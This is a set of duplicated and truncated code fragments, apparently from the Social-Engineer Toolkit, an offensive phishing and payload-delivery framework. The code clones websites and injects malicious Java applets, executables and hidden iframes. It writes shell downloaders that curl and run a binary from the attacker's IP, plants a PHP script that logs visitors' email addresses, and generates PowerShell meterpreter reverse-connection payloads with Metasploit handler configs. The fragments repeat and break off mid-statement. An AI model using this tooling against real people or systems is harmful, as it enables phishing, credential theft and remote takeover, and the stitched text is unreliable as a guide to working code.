# grab osx binary name
osx_name = setcore.generate_random_string(10,10)
downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
filewrite.write(downloader)
filewrite.close()
# grab nix binary name
linux_name = setcore.generate_random_string(10,10)
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2])
filewrite = file("%s/src/program_junk/web_clone/nix.bin" % (definepath), "w")
filewrite.write(downloader)
filewrite.close()
shutil.copyfile("src/payloads/set_payloads/shell.osx", "src/program_junk/web_clone/%s" % (osx_name))
shutil.copyfile("src/payloads/set_payloads/shell.linux", "src/program_junk/web_clone/%s" % (linux_name))
# check to see if we are using a staged approach or direct shell
stager = setcore.check_config("SET_SHELL_STAGER=").lower()
if stager == "off":
# only trigger if we are using the SETSHELL
if payload_selection == "SETSHELL":
# ensure that index.html is really there
if os.path.isfile("src/program_junk/web_clone/index.html"):
setcore.PrintStatus("Stager turned off, prepping direct download payload...")
fileopen = file("src/program_junk/web_clone/index.html", "r")
filewrite = file("src/program_junk/web_clone/index.html.3", "w")
data = fileopen.read()
# replace freehugs with ip and port
data = data.replace("freehugs", reverse_connection)
filewrite.write(data)
filewrite.close()
time.sleep(1)
# here we remove old stuff and replace with everything we need to be newer
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# COMMAND net group "Domain Admins" /domain yes The command you want to execute on the remote host
# RHOSTS yes The target address range or CIDR identifier
# RPORT 445 yes The Target port
# SMBDomain WORKGROUP no The Windows domain to use for authentication
# SMBPass no The password for the specified username
# SMBSHARE C$ yes The name of a writeable share on the server
# SMBUser no The username to authenticate as
# THREADS 1 yes The number of concurrent threads
# WINPATH WINDOWS yes The name of the remote Windows directory
# msf auxiliary(psexec_command) >
# grab config options for stage encoding
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
rhosts = input(core.setprompt(["32"], "Enter the IP Address or range (RHOSTS) to connect to")) # rhosts
# username for domain/workgroup
username = input(core.setprompt(["32"], "Enter the username"))
# password for domain/workgroup
password = input(core.setprompt(["32"], "Enter the password or the hash"))
domain = input(core.setprompt(["32"], "Enter the domain name (hit enter for logon locally)")) # domain name
threads = input(core.setprompt(["32"], "How many threads do you want [enter for default]"))
# if blank specify workgroup which is the default
if domain == "":
domain = "WORKGROUP"
def web_server_start():
# define if use apache or not
apache = False
# open set_config here
apache_check = core.check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = core.check_config("APACHE_DIRECTORY=")
if os.path.isdir(os.path.join(apache_path, "html")):
os.path.join(apache_path, "html")
apache = True
if operating_system == "windows":
apache = False
# specify the web port
web_port = core.check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config")) as fileopen:
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port = 8080
# check ip address
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter your ip address: ")
# unless we create template do self
template = "SELF"
# Grab custom or set defined
if os.path.isfile(os.path.join(core.setdir, "site.template")):
with open(core.setdir, "site.template") as fileopen:
for line in fileopen:
line = line.rstrip()
template_match = re.search("TEMPLATE=", line)
url_match = re.search("URL=", line)
if url_match:
# define url to clone here
url = line.split("=")[1].rstrip()
if template_match:
template = line.split("=")[1]
# if attach vector isn't set just set a default template
attack_vector = "nada"
# grab web attack selection
if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
for line in fileopen:
attack_vector = line.rstrip()
# Sticking it to A/V below
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
multiattack_harv = "on"
if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
multiattack_harv = "on"
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
os.chdir("src/html/")
# remove stale index.html files
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
if attack_vector == "java":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
shutil.copyfile("msf.exe", rand_gen)
# define browser attack vector here
if attack_vector == "browser":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
counter = 0
match = re.search(applet_name, line)
if match:
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line = line.replace("<head>",
'<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'.format(ipaddr))
filewrite.write(line)
counter = 1
if web_port == 8080:
line = line.replace(
"<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'.format(ipaddr))
filewrite.write(line)
counter = 1
if counter == 0:
filewrite.write(line)
if template == "CUSTOM" or template == "SELF":
# Bring our files to our directory
if attack_vector != 'hid' and attack_vector != 'hijacking':
print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(os.path.join(core.setdir, applet_name)):
shutil.copyfile(os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name))
shutil.copyfile(os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name))
if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
nix = core.check_options("NIX.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix))
if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
mac = core.check_options("MAC.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac))
if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
win = core.check_options("MSF.EXE=")
shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win))
# pull random name generation
core.print_status("The site has been moved. SET Web Server is now listening..")
rand_gen = core.check_options("MSF_EXE=")
if rand_gen:
if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe"))
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
shutil.copyfile(os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="99%%, 1%%">
<FRAME src="site.html">
<FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
</FRAMESET>
</HTML>""".format(ipaddr))
if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
os.remove(os.path.join(core.setdir, "web_clone/site.html"))
shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
os.path.join(core.setdir, "web_clone/site.html"))
with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
filewrite.write(docbase)
##########################################################################
#
# START WEB SERVER STUFF HERE
#
##########################################################################
if not apache:
if multiattack_harv == 'off':
try:
# specify port listener here
# specify the path for the SET web directories for the applet
# attack
path = os.path.join(core.setdir, "web_clone/")
try:
import src.core.webserver as webserver
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except:
thread.start_new_thread(webserver.start_server, (web_port, path))
# Handle KeyboardInterrupt
except KeyboardInterrupt:
core.exit_set()
# Handle Exceptions
except Exception as e:
core.log(e)
print("{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
"[!] There was an issue, printing error: {1}{2}".format(core.bcolors.RED, e, core.bcolors.ENDC))
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the
# applet attack
path = os.path.join(core.setdir + "web_clone")
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except:
print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".format(core.bcolors.RED, core.bcolors.ENDC))
sys.exit()
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = core.check_options("CUSTOM_EXE=")
if custom_exe:
while True:
# try block inside of loop, if control-c detected, then
# exit
try:
core.print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
input("\n{0}[*] Web Server is listening. Press Control-C to exit.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
# handle keyboard interrupt
except KeyboardInterrupt:
print("{0}[*] Returning to main menu.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
break
if apache:
subprocess.Popen("cp {0} {apache_path};"
"cp {1} {apache_path};"
"cp {2} {apache_path};"
"cp {3} {apache_path};"
"cp {4} {apache_path}".format(os.path.join(definepath, "src/html/*.bin"),
os.path.join(definepath, "src/html/*.html"),
os.path.join(core.setdir, "web_clone/*"),
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "*.jar"),
apache_path=apache_path),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).wait()
# if we are tracking users
if track_email == "on":
now = datetime.datetime.today()
with open(os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite:
filewrite.write("")
subprocess.Popen("chown www-data:www-data '{0}'".format(os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait()
# here we specify if we are tracking users and such
with open(os.path.join(apache_path, "index.html")) as fileopen:
data = fileopen.read()
data = data.replace("<body>",
"<body>"
"<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
"/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */".format(now))
with open(os.path.join(apache_path, "index.php"), "w") as filewrite:
filewrite.write(data)
core.print_status("All files have been copied to {}".format(apache_path))
##########################################################################
#
# END WEB SERVER STUFF HERE
#
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path = core.meta_path()
# grab nix binary name
linux_name = setcore.generate_random_string(10, 10)
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1],
payload_flags[2])
filewrite = file("%s/src/program_junk/web_clone/nix.bin" % (definepath),
"w")
filewrite.write(downloader)
filewrite.close()
shutil.copyfile("src/payloads/set_payloads/shell.osx",
"src/program_junk/web_clone/%s" % (osx_name))
shutil.copyfile("src/payloads/set_payloads/shell.linux",
"src/program_junk/web_clone/%s" % (linux_name))
# check to see if we are using a staged approach or direct shell
stager = setcore.check_config("SET_SHELL_STAGER=").lower()
if stager == "off" or payload_selection == "SETSHELL_HTTP":
# only trigger if we are using the SETSHELL
if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP":
# ensure that index.html is really there
if os.path.isfile("src/program_junk/web_clone/index.html"):
setcore.print_status(
"Stager turned off, prepping direct download payload...")
fileopen = file("src/program_junk/web_clone/index.html", "r")
filewrite = file("src/program_junk/web_clone/index.html.3", "w")
data = fileopen.read()
# replace freehugs with ip and port
data = data.replace("freehugs", reverse_connection)
filewrite.write(data)
filewrite.close()
time.sleep(1)
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# COMMAND net group "Domain Admins" /domain yes The command you want to execute on the remote host
# RHOSTS yes The target address range or CIDR identifier
# RPORT 445 yes The Target port
# SMBDomain WORKGROUP no The Windows domain to use for authentication
# SMBPass no The password for the specified username
# SMBSHARE C$ yes The name of a writeable share on the server
# SMBUser no The username to authenticate as
# THREADS 1 yes The number of concurrent threads
# WINPATH WINDOWS yes The name of the remote Windows directory
# msf auxiliary(psexec_command) >
# grab config options for stage encoding
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
rhosts = input(
core.setprompt(
["32"],
"Enter the IP Address or range (RHOSTS) to connect to")) # rhosts
# username for domain/workgroup
username = input(core.setprompt(["32"], "Enter the username"))
# password for domain/workgroup
password = input(core.setprompt(["32"], "Enter the password or the hash"))
domain = input(
core.setprompt(
if operating_system == "posix":
try:
import pexpect
except ImportError:
core.print_error("python-pexpect is not installed.. some things may not work.")
core.return_continue()
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# see if we are tracking emails
track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = core.check_options("APPLET_NAME=")
if applet_name == "":
applet_name = core.generate_random_string(6, 15) + ".jar"
core.update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if core.check_options("CUSTOM_EXE="):
custom = 1
core.print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
core.print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
core.print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
def web_server_start():
# define if use apache or not
apache = False
# open set_config here
apache_check = core.check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = core.check_config("APACHE_DIRECTORY=")
if os.path.isdir(os.path.join(apache_path, "html")):
os.path.join(apache_path, "html")
apache = True
if operating_system == "windows":
apache = False
# specify the web port
web_port = core.check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config")) as fileopen:
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port = 8080
# check ip address
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter your ip address: ")
# unless we create template do self
template = "SELF"
# Grab custom or set defined
if os.path.isfile(os.path.join(core.setdir, "site.template")):
with open(core.setdir, "site.template") as fileopen:
for line in fileopen:
line = line.rstrip()
template_match = re.search("TEMPLATE=", line)
url_match = re.search("URL=", line)
if url_match:
# define url to clone here
url = line.split("=")[1].rstrip()
if template_match:
template = line.split("=")[1]
# if attach vector isn't set just set a default template
attack_vector = "nada"
# grab web attack selection
if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
for line in fileopen:
attack_vector = line.rstrip()
# Sticking it to A/V below
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
multiattack_harv = "on"
if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
multiattack_harv = "on"
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
os.chdir("src/html/")
# remove stale index.html files
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
if attack_vector == "java":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
shutil.copyfile("msf.exe", rand_gen)
# define browser attack vector here
if attack_vector == "browser":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
counter = 0
match = re.search(applet_name, line)
if match:
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line = line.replace(
"<head>",
'<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'
.format(ipaddr))
filewrite.write(line)
counter = 1
if web_port == 8080:
line = line.replace(
"<head>",
'<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'
.format(ipaddr))
filewrite.write(line)
counter = 1
if counter == 0:
filewrite.write(line)
if template == "CUSTOM" or template == "SELF":
# Bring our files to our directory
if attack_vector != 'hid' and attack_vector != 'hijacking':
print(core.bcolors.YELLOW +
"[*] Moving payload into cloned website." +
core.bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(os.path.join(core.setdir, applet_name)):
shutil.copyfile(
os.path.join(definepath,
"src/html/Signed_Update.jar.orig"),
os.path.join(core.setdir, applet_name))
shutil.copyfile(
os.path.join(core.setdir, applet_name),
os.path.join(core.setdir, "web_clone", applet_name))
if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
nix = core.check_options("NIX.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"),
os.path.join(core.setdir, "web_clone", nix))
if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
mac = core.check_options("MAC.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"),
os.path.join(core.setdir, "web_clone", mac))
if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
win = core.check_options("MSF.EXE=")
shutil.copyfile(os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "web_clone", win))
# pull random name generation
core.print_status(
"The site has been moved. SET Web Server is now listening..")
rand_gen = core.check_options("MSF_EXE=")
if rand_gen:
if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
shutil.copyfile(
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "web_clone/msf.exe"))
print(
"\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
)
shutil.copyfile(
os.path.join(core.setdir, "web_clone/msf.exe"),
os.path.join(core.setdir, "web_clone", rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
docbase = (
r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="99%%, 1%%">
<FRAME src="site.html">
<FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
</FRAMESET>
</HTML>""".format(ipaddr))
if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
os.remove(os.path.join(core.setdir, "web_clone/site.html"))
shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
os.path.join(core.setdir, "web_clone/site.html"))
with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
filewrite.write(docbase)
##########################################################################
#
# START WEB SERVER STUFF HERE
#
##########################################################################
if not apache:
if multiattack_harv == 'off':
try:
# specify port listener here
# specify the path for the SET web directories for the applet
# attack
path = os.path.join(core.setdir, "web_clone/")
try:
import src.core.webserver as webserver
p = multiprocessing.Process(target=webserver.start_server,
args=(web_port, path))
p.start()
except:
thread.start_new_thread(webserver.start_server,
(web_port, path))
# Handle KeyboardInterrupt
except KeyboardInterrupt:
core.exit_set()
# Handle Exceptions
except Exception as e:
core.log(e)
print(
"{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
"[!] There was an issue, printing error: {1}{2}".format(
core.bcolors.RED, e, core.bcolors.ENDC))
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop",
shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the
# applet attack
path = os.path.join(core.setdir + "web_clone")
p = multiprocessing.Process(
target=webserver.start_server,
args=(web_port, path))
p.start()
except:
print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".
format(core.bcolors.RED, core.bcolors.ENDC))
sys.exit()
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = core.check_options("CUSTOM_EXE=")
if custom_exe:
while True:
# try block inside of loop, if control-c detected, then
# exit
try:
core.print_warning(
"Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!"
)
input(
"\n{0}[*] Web Server is listening. Press Control-C to exit.{1}"
.format(core.bcolors.GREEN, core.bcolors.ENDC))
# handle keyboard interrupt
except KeyboardInterrupt:
print("{0}[*] Returning to main menu.{1}".format(
core.bcolors.GREEN, core.bcolors.ENDC))
break
if apache:
subprocess.Popen("cp {0} {apache_path};"
"cp {1} {apache_path};"
"cp {2} {apache_path};"
"cp {3} {apache_path};"
"cp {4} {apache_path}".format(
os.path.join(definepath, "src/html/*.bin"),
os.path.join(definepath, "src/html/*.html"),
os.path.join(core.setdir, "web_clone/*"),
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "*.jar"),
apache_path=apache_path),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).wait()
# if we are tracking users
if track_email == "on":
now = datetime.datetime.today()
with open(
os.path.join(apache_path, "harvester_{}.txt".format(now)),
'w') as filewrite:
filewrite.write("")
subprocess.Popen("chown www-data:www-data '{0}'".format(
os.path.join(apache_path, "harvester_{}.txt".format(now))),
shell=True).wait()
# here we specify if we are tracking users and such
with open(os.path.join(apache_path, "index.html")) as fileopen:
data = fileopen.read()
data = data.replace(
"<body>", "<body>"
"<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
"/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */"
.format(now))
with open(os.path.join(apache_path, "index.php"),
"w") as filewrite:
filewrite.write(data)
core.print_status(
"All files have been copied to {}".format(apache_path))
##########################################################################
#
# END WEB SERVER STUFF HERE
#
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path = core.meta_path()
try:
import pexpect
except ImportError:
core.print_error(
"python-pexpect is not installed.. some things may not work.")
core.return_continue()
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# see if we are tracking emails
track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = core.check_options("APPLET_NAME=")
if applet_name == "":
applet_name = core.generate_random_string(6, 15) + ".jar"
core.update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if core.check_options("CUSTOM_EXE="):
custom = 1
core.print_status(
"Note that since you are using a custom payload, you will need to create your OWN listener."
)
core.print_status(
index_database = re.sub("<head.*?>", "\n<head>" + repeater_database, index_database)
if unc_embed.lower() == "on":
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub("</body.*?>", unc_database + "\n</body>", index_database)
if not match:
index_database = re.sub("<head.*?>", "\n<head>" + unc_database, index_database)
counter = 0
# confirm we can find body
match = re.search("</body.*?>", index_database)
if match:
counter = 1
index_database = re.sub("</body.*?>", applet_database + "\n</body>", index_database)
check_redirect = core.check_config("AUTO_REDIRECT=")
if check_redirect.lower() == "on":
index_database = index_database.replace('<param name="nextPage" value=""', '<param name="nextPage" value="%s"' % (url))
if not match:
match = re.search("<head.*?>", index_database)
if match:
counter = 1
index_database = re.sub("<head.*?>", "\n<head>" + applet_database, index_database)
check_redirect = core.check_config("AUTO_REDIRECT=")
if check_redirect.lower() == "on":
index_database = index_database.replace('<param name="nextPage" value=""', '<param name="nextPage" value="%s"' % (url))
# start appending and prepping the index file
if java_repeater.lower() == "on":
match = re.search("</body.*?>", index_database)
if match:
def prep_powershell_payload():
# grab stage encoding flag
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
# check to see if we are just generating powershell code
powershell_solo = core.check_options("POWERSHELL_SOLO")
# check if port is there
port = core.check_options("PORT=")
# check if we are using auto_migrate
auto_migrate = core.check_config("AUTO_MIGRATE=")
# check if we are using pyinjection
pyinjection = core.check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
pyinjection = "on"
core.print_status("Multi/Pyinjection was specified. Overriding config options.")
else:
pyinjection = "off"
# grab ipaddress
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter the ipaddress for the reverse connection: ")
core.update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection
multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower()
# turn off multi injection if pyinjection is specified
if pyinjection == "on":
multi_injection = "off"
# check what payloads we are using
powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
# if we specified a hostname then default to reverse https/http
if not core.validate_ip(ipaddr):
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
port = "443"
with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen:
data = fileopen.read()
match = re.search(port, data)
if not match:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set LPORT {2}\n"
"set EnableStageEncoding {3}\n"
"set ExitOnSession false\n"
"exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
# check to see if the meta config multi pyinjector is there
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
if core.check_options("PORT=") != 0:
port = core.check_options("PORT=")
# if port.options isnt there then prompt
else:
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
port = "443"
core.update_options("PORT={0}".format(port))
# turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON":
multi_injection = "off"
pyinjection = "on"
# if we are using multi powershell injection
if multi_injection == "on" and pyinjection == "off":
core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable
x86 = ""
# specify a list we will use for later
multi_injection_x86 = ""
# here we do some funky loops so we don't need to rewrite the code below
if multi_injection == "on":
port = core.check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports:
core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports))
multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports)
if not port_check:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding {2}\n"
"set LPORT {3}\n"
"set ExitOnSession false\n"
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
# if we aren't using multi pyinjector
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if meta config isn't created yet then create it
if not os.path.isfile():
with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite:
filewrite.write("")
port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports)
if not port_check:
with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding {2}\n"
"set ExitOnSession false\n"
"set LPORT {3}\n"
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
injections = []
# read in the file we need for parsing
with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen:
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",")
# format: payload<space>port
for payload in payloads:
# format: payload<space>port
payload = payload.split(" ")
powershell_inject_x86 = payload[0]
port = payload[1]
core.print_status("Generating x86-based powershell injection code...")
injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86))
multi_injection_x86 = ",".join(injections)
# if its turned to off
